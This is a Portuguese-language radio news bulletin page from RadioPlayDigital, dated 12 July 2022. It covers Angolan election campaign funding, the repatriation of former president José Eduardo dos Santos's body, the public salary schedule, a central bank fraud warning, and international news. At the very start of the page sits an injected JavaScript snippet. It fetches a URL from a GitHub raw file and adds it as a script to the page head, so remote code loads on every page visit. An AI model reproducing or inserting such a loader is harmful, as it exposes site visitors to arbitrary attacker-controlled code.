;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Noticias às 12, edição de 12 de Julho de 2022 | RadioPlayDigital
Noticias às 12, edição de 12 de Julho de 2022

UNITA APALAUDE MEDIDA QUE VISA AUMENTO DE DINHEIRO PARA CAMPANHA ELEITORAL DOS PARTIDOS POLÍTICOS, CASA-CE DIZ QUE VALOR É INSUFICIENTE; 

DISPUTA ENTRE FAMILIARES E ESTADO ANGOLANO SOBRE O CORPO DO EX CHEFE DE ESTADO, AINDA SEM POSSÍVEL CONCENSO; 

SALÁRIO DO MÊS DE AGOSTO DA FUNÇÃO PÚBLICA CAI NO DIA 17, ESPECIALISTA REVELA QUE DECISÃO PODE PASSAR POR CAMPANHA ELEITORAL; 

BNA ALERTA DIVULGAÇÃO DE MENSAGENS FRAUDULENTAS NAS REDES SOCIAIS SOBRE SUPOSTO PERFIL DO PRESIDENTE DO BANCO CENTRAL; 

RÚSSIA PREPARA-SE PARA FECHAR FORNECIMENTO DE GÁS PARA A EUROPA ALERTA PRESIDENTE UCRANIANO; 

JINGLE NOTÍCIAS

Jornal da tarde MFM, terça-feira 12 de julho de 2022, tem o suporte técnico de Edmundo Simões e Edson Machado, coordenação de Alves Fernandes, edição de Abílio Cândido, apresentação de Tony Fancy.

JINGLE ELEIÇÕES

A Comissão Nacional Eleitoral, considera ser importante a formação de formadores a delegados de mesa. 

O Porta-Voz do CNE, Lucas Quilundo, diz que o foco desta acção formativa tem a ver com a responsabilidade de organizar, dirigir e coordenar os trabalhos na mesa de voto, desde abertura da votação e o escrutínio.

LUCAS QUILUNDO

PONTO

O Presidente da república, João Lourenço, reviu nesta segunda-feira, em alta o valor a atribuir aos partidos para a campanha eleitoral, que passou de 445 milhões de kwanzas para 1.112 milhões quase três vezes mais.

O decreto presidencial não menciona os motivos que levaram ao ajustamento do montante de financiamento público a atribuir a cada uma das oito candidaturas aprovadas pelo Tribunal Constitucional.

O valor de Mil e Cento e Doze Milhões e Cinquenta Mil Kwanzas é atribuído a cada uma das candidaturas concorrentes, cujas listas foram já afixadas pelo Tribunal Constitucional.

Inicialmente, tinha sido aprovada uma verba de 444,8 milhões de kwanzas para o financiamento público das campanhas eleitorais dos sete partidos políticos e uma coligação.

Em reacção, o presidente da Coligação CASA-CE, Manuel Fernandes, defende, que a intenção do presidente, João Lourenço, justifica-se pela pressão feita pelos partidos na oposição e realça que ainda assim, o reajuste é insuficiente.

MANUEL FERNANDES 1 12H00

Manuel Fernandes, revela ainda que haverá um encontro na tarde de hoje para avaliar a resposta do presidente em função do memorando remetido pelos partidos na oposição.

MANUEL FERNANDES 2 12H00

Para o deputado da UNITA, o presidente esteve bem ao fazer este reajuste, destacando, que a democracia de um país carece de investimento.

EKUIKUI 12H00

Já o parlamentar independente, Lindo Bernardo Tito, diz que os dinheiros disponibilizados, servem para a preparação das campanhas dos partidos políticos concorrentes as eleições gerais. 

O político, defende ainda que o valor, chaga tarde, quando faltam poucos dias para o início das campanhas eleitorais.

LINDO BERNARDO 12H00

PONTO

Os sete partidos e coligação concorrentes às eleições gerais de 24 de agosto em Angola entregam hoje listas de candidatos no Tribunal Constitucional. Presidente quase triplica valor para financiar campanha dos partidos.

Em anúncio divulgado no sábado, o TC referiu que foram admitidas as candidaturas de sete partidos políticos, nomeadamente; MPLA, UNITA, PRS, FNLA, APN, PH e P-Njango e uma coligação CASA-CE.

A ordem de apresentação das candidaturas nos boletins de voto será objeto de sorteio a realizar pela Comissão Eleitoral Nacional.

Mais de 14 milhões de angolanos, incluindo residentes no estrangeiro, estão habilitados a votar em 24 de agosto, naquela que será a quinta eleição da história de Angola.

Os 220 membros da Assembleia Nacional angolana são eleitos por dois métodos: 130 membros de forma proporcional pelo chamado círculo nacional, e os restantes 90 assentos estão reservados para cada uma das 18 províncias de Angola, usando o método de Hondt e em que cada uma elege cinco parlamentares.

Desde que entrou em vigor a Constituição de 2010 que não se realizam eleições presidenciais, sendo o Presidente e o vice-presidente de Angola os dois primeiros nomes da lista do partido mais votado no círculo nacional.

PONTO

A transladação do corpo do ex-Presidente da República, José Eduardo dos Santos, de Barcelona, onde faleceu sexta-feira última, vítima de doença, para Luanda, ainda não tem data confirmada, embora decorram os procedimentos inerentes ao processo com uma equipa especial enviada pelo presidente da República para as devidas negociações.

Jornalista, Romão de Jesus; 

ROMÃO DE JESUS 12H00

E o  Chefe de Estado, João Lourenço, rendeu, esta segunda-feira homenagem à figura do ex-Presidente, José Eduardo dos Santos, com assinatura do livro de condolências, na Praça da República, adjacente ao Memorial Dr. António Agostinho Neto, em Luanda.

Na sequência, assinaram, também, o livro de condolências o presidente da Assembleia Nacional, Fernando da Piedade Dias dos Santos, Juízes dos Tribunais Superiores, ministros de Estado, Titulares do Poder Executivo, entre outras personalidades.

O Presidente da Assembleia Nacional, Fernando da Piedade Dias dos Santos, recorda José Eduardo dos Santos, quando o indicou ao cargo de primeiro-ministro da República de Angola em 2002.

FERNANDO DA PIEDADE 12H00

E o nacionalista, Lopo do nascimento, considera a morte de Eduardo dos Santos como um momento de profunda tristeza para a família e os angolanos.

LOPO DO NASCIMENTO 12H00

José Eduardo dos Santos chegou ao poder em Setembro de 1979, na sequência da morte do Primeiro Presidente de Angola, António Agostinho Neto.

Ocupou as funções de Presidente da República durante 38 anos, até Setembro de 2017, altura em que foi sucedido pelo actual Chefe de Estado, João Lourenço.

PONTO

A Direcção Nacional do Orçamento do Estado, do Ministério das Finanças, divulgou, hoje, uma nota em que orienta os gestores das unidades orçamentais do Estado a procederem ao pagamento do salário de Agosto até ao dia 17 daquele mês.

Esta orientação deve-se ao facto de a Direcção Nacional do Orçamento do Estado ter de proceder a uma acção de manutenção no Sistema Integrado de Gestão Financeira do Estado, a fim de melhorar o desempenho do mesmo, no período de 26 a 30 de Agosto.

De acordo ainda com o documento da Direcção Nacional do Orçamento do Estado do Ministério das Finanças, este posicionamento vem também na sequência dos constrangimentos verificados na operacionalização do sistema no período de processamento salarial.

O especialista em auditoria externa e análise de branqueamento de capitais, Carlos Cabaça, diz que este posicionamento… 

CARLOS CABAÇA 12H00 

O especialista em auditoria externa e análise de branqueamento de capitais, Carlos Cabaça

Assim, será antecipado o processamento salarial do mês de Agosto, conforme calendário adoptado e de cumprimento escrupuloso.

O mesmo calendário de processamento salarial de Agosto de 2022 tem num primeiro momento a fase da folha, cuja data inicial é agora 17 de Julho e a data final de movimento vai até 5 de Agosto.

Já para o momento a seguir que é o do processamento, o mesmo decorre a 8 de Agosto. 

Segue-se a fase de correcção, que vai de 9 a 16 de Agosto, período em que é feita também a aceitação da informação tratada, para até 17, conforme estipulado, decorra o pagamento efectivo nas unidades públicas e sector empresarial do Estado.

PONTO

O Banco Nacional de Angola informou em comunicado divulgado na sua página institucional, ter tomado conhecimento da divulgação de mensagens fraudulentas na rede social Facebook, cujo usuário se faz passar pelo governador José de Lima Massano, com recurso à sua imagem.

Neste sentido, o BNA comunica e esclarece que se trata de uma situação de uso abusivo de imagem e identidade, advertindo, por isso, os usuários a ignorarem o referido contacto e abordagem, e a absterem-se de trocar quaisquer informações, seja qual for a natureza, visando evitar, deste modo, riscos de burlas.

Sobre o assunto, o Sociólogo Paulo Inglês, sugere que para evitar um número maior de pessoas vítimas dos malfeitores, por trás desses perfis, os órgãos de comunicação social deveriam divulgar sobre o modus operandi destes criminosos.

RD PAULO INGLÊS 12H00

Banco nacional de angola alerta divulgação de mensagens fraudulentas na rede social facebook sobre suposto perfil do presidente do banco central, especialista aconselha divulgação massiva nos órgãos de comunicação sobre novas formas de fraudes adoptadas por criminosos das redes sociais

DESPORTO

A seleção nacional sénior masculina de andebol segue confiante no confronto de hoje com o Senegal em jogo referente a segunda jornada do campeonato africano que decorre no Egipto.  

Mais pormenores da actualidade desportiva, com Hilário Leonardo;

HILÁRIO -DIRECTO 12H00 

INTERNACIONAL 

O Presidente da Ucrânia, Volodymy Zelensky, alertou hoje que a Rússia prepara-se para “fechar completamente o fornecimento de gás para a Europa”, após o Canadá ter decidido entregar uma turbina do gasoduto Nord Stream 1 à Alemanha.

Agora, não há dúvida de que a Rússia tentará não apenas limitar o máximo possível, mas fechar completamente o fornecimento de gás para a Europa no momento mais agudo”, indicou o chefe de Estado ucraniano no serviço de mensagens Telegram.

Para Zelensky, a decisão do Canadá, que, segundo o mesmo, “levanta muitos problemas, ainda pode ser revisada”.

“A Rússia nunca jogou de acordo com a regras no setor da energia e não o vai fazer agora, a menos que veja poder”, acrescentou.

A Ucrânia convocou hoje o embaixador do Canadá em Kyiv, após o anúncio “inaceitável” da devolução à Alemanha das turbinas do gasoduto Nord Stream 1, por onde entra grande parte do gás natural russo.

::::::

O Presidente dos Estados Unidos, Joe Biden, assegurou segunda-feira que está “determinado” a ir mais longe na luta contra a violência armada e a proibir novamente a venda de armas de assalto que transformam o país em “campos de batalha”.

O chefe de Estado falava na Casa Branca durante a cerimónia de assinatura de uma lei destinada a fortalecer a regulamentação das armas de fogo, a mais importante em quase 30 anos, aprovada graças ao acordo entre democratas e republicanos.

No entanto, Biden lembrou que esta continua muito aquém das suas ambições nesta matéria.

A votação deste projeto de lei, possível graças aos votos de vários senadores republicanos, ocorreu após dois tiroteios em grande escala que chocaram o país.

FIM/FIM

Data de Emissão: 12-07-2022 às 12:00
Género(s): Noticiário
 
PUB RADIO PLAY

Relacionados